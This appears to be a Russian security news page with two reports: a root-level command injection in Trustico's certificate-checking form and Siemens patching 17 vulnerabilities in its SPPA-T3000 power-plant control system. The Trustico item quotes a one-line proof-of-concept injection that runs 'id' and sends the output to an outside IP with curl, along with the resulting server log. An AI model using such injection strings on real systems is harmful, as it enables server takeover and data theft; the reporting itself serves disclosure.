Все сертификаты Trustico отзовут из-за полной компрометации сервера

Все сертификаты Trustico отзовут из-за полной компрометации сервера

Ранее освещенная история с проблемными сертификатами, полученными через реселлера Trustico, усугубилась новыми подробностями. В веб-интерфейсе сервиса была обнаружена уязвимость, позволяющая получить к серверу root-доступ.

Если раньше эксперты только гадали, что может быть причиной того, что Trustico решила отозвать выданные сертификаты, то сейчас ситуация начинает проясняться. Похоже, что такое решение связано с киберинцидентом, подорвавшим безопасность реселлера.

Сама брешь имеет довольно посредственный характер — допускается ввод без экранирования спецсимволов. Таким образом, если кто-либо введет в форме проверки сертификата шелл-операторы, они будут исполнены на серверы с правами root.

Об этой проблеме сообщили эксперты Manawyrm и Predrag Cujanović в Twitter.

В качестве примера специалисты приводят ввод следующую строку:

$(curl https://3.5.6.9/`id`)

Которая отправит на хост запрос:

3.5.6.9 - [01/Mar/2018:09:52:14 -0500] "GET /uid=0(root) HTTP/1.1" 404 209 "-" "curl/7.29.0"

Сообщается, что на данный момент сайт Trustico недоступен. Специалистам пока не удалось выяснить, позволяет ли данная брешь скомпрометировать приватные ключи сертификатов, однако одному из исследователей удалось найти в конфигурации секретный ключ для SSL-сертификта домена «*.trustico.com».

Следовательно, в ближайшее время DigiCert и Comodo отреагируют на инцидент, что, скорее всего, приведет к отзыву всех выданных через Trustico сертификатов.

Anti-Malware TelegramПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

Siemens устранил 17 дыр в системе управления производством энергии

Positive Technologies помогла Siemens устранить опасные уязвимости в системе управления производством электроэнергии. Уязвимости были обнаружены в двух компонентах SPPA-T3000 — в сервере приложений и сервере миграции.

В коде сервера приложений было найдено семь уязвимостей. Три из них позволяют выполнить произвольный код в системе. В первом случае это возможно благодаря использованию незащищенного сервиса Remote Method Invocation (RMI), причем для эксплуатации уязвимости аутентификация не требуется. Другая возможность выявлена в сервисе Java Management Extensions (JMX), запущенном на сервере приложений. Выполнить код в системе позволяет и наличие в системе метода, доступного через удаленный вызов процедур (RPC-метода), предназначенного для администрирования и не требующего аутентификации.

Еще три уязвимости сервера приложений связаны с недостатком аутентификации некоторых сервисов, который позволяет остановить некоторые запущенные внутри системы контейнеры и вызвать отказ в обслуживании сервера. Последняя уязвимость позволяет загружать произвольные файлы без какой-либо авторизации.

Другие десять уязвимостей обнаружены в сервере миграции MS-3000. В их числе две возможности удаленного чтения и записи произвольных файлов. Так, например, злоумышленник может прочитать файл /etc/shadow, содержащий зашифрованные пароли пользователей, и попробовать подобрать пароль.

Также выявлены множественные недостатки безопасности типа «переполнение буфера на куче». Их эксплуатация может, среди прочего, привести к отказу сервера миграции.

«Эксплуатация некоторых уязвимостей может позволить злоумышленнику выполнить произвольный код на сервере приложений (одном из важнейших компонентов системы SPPA-T3000), получить контроль над технологическим процессом и нарушить его. Это грозит прекращением выработки электроэнергии и аварийными ситуациями на ТЭС или ГЭС — там, где установлена уязвимая система», — отмечает руководитель отдела безопасности промышленных систем управления Positive Technologies Владимир Назаров.

Пользователям рекомендуется установить последнюю версию SPPA-T3000, в которой устранены обнаруженные уязвимости.

Anti-Malware TelegramПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru